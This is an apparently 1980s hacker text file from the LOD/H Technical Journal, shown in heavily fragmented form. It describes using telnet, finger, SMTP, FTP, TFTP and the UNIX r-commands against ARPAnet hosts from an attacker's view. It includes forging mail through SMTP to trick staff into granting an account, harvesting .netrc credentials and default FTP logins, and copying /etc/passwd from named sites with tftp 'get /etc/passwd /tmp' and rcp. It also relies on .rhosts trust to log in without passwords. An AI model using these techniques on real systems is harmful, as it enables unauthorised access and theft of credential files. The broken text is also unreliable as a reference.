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/H Technical Journal: File #2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23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ritten this article with the assumption that those reading i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nowledge of UNIX and large networks, specifically the DARP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PAnet and MILnet. Within I offer guidance on features of the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Transmission Control Protocol) architecture, such as FTP, T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SMTP, and the UNIX Remote Execution Facilities. Before I comm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it known that this file is not intended to be a 'why'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'how to' tutorial. In the event I get a good respons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I may later release a more technical oriented pap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stances where I give examples of a command format, words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. For example, in the line '$ telnet HOST', H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(in LOWERCASE!) by the name of a system. This is just m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actual command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are denoted in the form of an exponent, eg. ^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on every UNIX that supports TCP-IP are a set of files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s the yellow pages, that serve as a directory of the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ccessible by your system. These files are /etc/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etworks respectively. There may also be a third, /etc/hosts.equ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those hosts that share resources and/or have user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y are ASCII text and have viewable permission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may prove helpful to print these out for referenc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Entries in the above mentioned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.###.###.###     host.owner.research  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72.0.39          athena.mit.edu   mit-athena at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of numbers, expressed in octal "dot notation", is the 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. Followed by the complete name, and lastly other name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known as. When attempting to access a system,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of the databases one will come across are incomplet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. A complete host list can be obtained from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(NIC) at SRI International, the host name is sri-nic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is the standard facility used for logging into other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 only on UNIX, but TOPS, VMS, and all the other variou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und on the DDN. To activ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net HOST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voked without arguments, it enters command mode,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'telnet&gt;' From here, many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OS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onnection to named computer. If PORT, which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is ommitted then telnet will contact the TELNET serv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As earlier mentioned, systems can be addressed by ei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umber, NetName, or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connection and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ession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urrent status of telnet. ie. connections and togg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telnet. This allows you to operate an interactive sh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while pending an open connection to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help on COMMAND. Or if COMMAND is ommitted, then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nection has been established, telnet enters input mod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directly with the remote. To return to command mode, enter ^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cking sess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net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10.2.0.7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ucbvax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UNIX (ucbvax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ost on the Internet runs various daemons to perform tedious up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like recording logs, mounting disks and on UNIX, cleaning uucp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ong with the 'normal' daemons is one ran to accomod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host and its peers on a network. inetd the managing daem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communication has a number of various services which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but they can also be manually addressed via telnet. The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layed,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net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open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ach service has a port number associated with it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in the range 0-1023. A database of all active service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file /etc/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hacker's view the following are very helpful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a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Finger server. Connecting to this will give a systat repor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 user would get if he was on the target system and issued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nce connected to port 79, the host will sit idle until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Either a return is pressed and a general finger will resul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entered where personal info wil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net psuvax1.psu.edu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128.118.6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suvax1.p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Name              TTY Idle    When     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      The Operator          co      Sat 19:02  334  Whitmo  x5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    William W. Hager      d1      Sat 18:50              237-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   Georg Schnitger       22 1:32 Sat 18:42  315  Whitmo  x5-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k    Sohail Malik          p0  18  Sat 19:16  214c  Compu  x5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Systat server. This can not be issued to target UNIX system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VMS and TOPS where it returns data like that from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SMTP server. This is the server used for mail among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st vulnerable port to attack as it can be easily foole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e hacker can assume any identity he wishes through m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nd mail to guest@cc3.bbn.com from root@satnet.arpa,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ne would have to possess the root account wherefrom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il guest@cc3.bb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not always feasible or possible! So we must reso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devious approa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net cc3.bbn.co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8.3.0.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c3.bb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cc3.bbn.com. Sendmail 3.2/SMI-3.2 ready at Fri, 28 Feb 87 17:40:53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t to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guest... Recipi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: root@satnet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example... Send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Enter mail, end with "."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SMT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Mai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he text above; First, contact the remote at port 2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net HOS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ystem link authenticati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t to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? Type in bogus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: USERNAME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rganization has of late been discussing an upgrade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e Sun computer we are currently using is immensely sl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lower!) due to the demands put on it by the users. If you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demo account on your system so I may view its performanc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spond to me through mail at: bogus!haha!sys1!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n a line by itself will complete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is a file transfer program that is quite powerful and help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n obtaining access to a target. It can be us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imilar to telnet, the client with which to commun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tp -n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n option I always include as it disables auto-login and net-tra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eature which sends the originator's login and system name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TP is 'ftp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connection to the nam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connection and return to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hell command on local machine. Like the 'z' option of tel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mmitted, than an interactive shell is invoked. ^D will retur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listing of the directory contents on the remote ho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. To do a long listing, enter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EMOT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orking directory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working directory on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orking directory on the local machine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MOTE_FILE LOC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REMOTE_FILE on the remote system and name it LOCAL_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OCAL_FILE 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OCAL_FILE to the host and name it REMO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LOCAL_FILE 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LOCAL_FILE to the end of the distant file, REMO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MOTE_FILE NEW_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new name to a rem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MO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REMO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commands exist for bulk transfers and direct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doubt ever on a command, help is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nection has been made, the computer will identify itsel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dle. (That is, if auto-logging is disabled as it should be.)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use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f a pass is required, the proper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t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o ll-xn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L-X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l-xn FTP server (Version 4.103 Wed Jun 25 17:42:33 EDT 1986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Guest login ok, send ident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n to a FTP server is different than normally entering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user is operating FTP, the exchange is treated as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daemon, not an actual login. Therefore, a different log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tricts use immensely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up properly, FTP will chroot to /usr/spool/ftp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xist, bin, etc, and pub. Within /usr/spool/ftp/et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used for the FTP server login program. It is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in /etc/passwd, but it can be useful by providing us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f mentioning is /etc/ftpusers. This file contain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names is like /usr/lib/cron/cron.deny on a Unix System V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 and your username appears in the file, FTP logins ar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defaults are present within this doctored version of /etc/passw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ways will provide access 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           anonymous, gues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          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    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ser                   ft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ser                  tft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 may have in their home directory a file titled '.netrc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usernames and passwords used on systems that a use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s with. Entries in the file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OST login USERNAME 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dvantageous to locate all of these files on your system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not only your systems list, but also your chance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dmittance has been gained, I suggest copying the /etc/passw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ttempts at hacking the front end of the system if other ro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finger, TFTP (To be explained hereafter.), or by wa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(Ditto.)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 /etc/passw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RT command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Opening data connection for /etc/passwd (26.8.0.14,1389) (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received in 0.32 seconds (0.15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vial File Transfer Program is probably the most dangerous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IP structure on the Internet. TFTP requires no account or passwo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a host system. About the only restriction is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d must have public read access permissions set. If n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ailure error will result. Also, the TFTP server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otherwise no transmissions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ftp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onnected, the user will get the 'tftp&gt;' prompt where from he can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OST up for transfers. There is no actual connection made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 has happened, the program merely remembers what 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transfer inquiry. Therefore, there is not a dis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urrent set parameters. ie. HOST and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/PATH/FILE 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PATH/FILE from HOST and name it /PATH/FILE on local system. If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yet, the form may be 'get HOST:/PATH/FILE /PATH/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/PATH/FILE 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/PATH/FILE on local system to HOST and give it the title /PATH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if HOST has not been specified, the form is 'put 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/PATH/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out parameter. The default is 25, that means abort transmi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from selected host after s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TP is the preferred method of file transfer. But is often cl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insecurities. To the hacker though, it is wonderful be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re genuine, not doctored versions as is the case with FTP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one will most likely use it to copy /etc/pass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ftp mit-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&gt; get /etc/passwd /tmp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16453 bytes in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o the standard features of the TCP setup pres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f the net, UNIX has a set of it's own remot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set of utilities, which I affectionately call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acilities, are usable only between resource sharing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lomeration of remote programs can be very helpful for overtak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argets, especially if they are part of a small network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sides being major ho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sets out on the quest of conquering a system, it is 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urrently logg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users -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ers -l alone will print out a listing for all immediate surround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but if a HOST is specified, only that particular computer wi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login HOST -l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l USERNAME is not included, the account name in use at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USERNAME when attempting login to HOST. If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present locally and on the distant mach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hosts.equiv, no password is required to login. This can be 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, a reason why the security wise will oft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hosts.equiv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 may optionally have a file, '.rhost', in his hom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sonal equivalent to /etc/hosts.equiv. If you are logg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such a file, no pass is required to login (via rlogin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ke to the UUCP protocol, there is an allowance of the Remo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preform commands on a network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sh HOST -l USERNAM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hell will permit unlimited commands to be carried ou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riteria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, if specified (If it is not, the current loca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), must be present on the foreign system and have remo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effective according to the environment set in .csh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n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sh century "ps -t cons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quotes are ommitted then variables like *?.,\ ar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no redirection is submitted, than output, if the command yiel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ack to the iss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py, a sub-command of rsh, is a command similar to uucp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riteria of Remote Shell plus all files qued must have public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cp HOST:/PATH/FILE HOST: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common call would be the password file. So if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/etc/passwd file from harvard.arpa to rut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cp harvard.arpa:/etc/passwd rutgers:/tmp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leaves quite alot of flexibility as it stands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re possible. If the second HOST is not inserted, tha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able option of rcp is directory copy. It will if specified,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the trees beneath it...allowing you to in theo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system onto your local host. (uh, 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cp -d HOST:/PATH/DIRECTORY_NAME HOST:/PATH/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 I would like to state that I have purposely lef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covered if I felt it would compromise an institution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igize for not explaining many of the subjects discusse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y deserve, but if I had this article would have been mam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, challenges, comments, or criticism can be direct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tate, through any of a various boards I visit or to an LOD/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ccount of which your mail shall be somehow communica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Unix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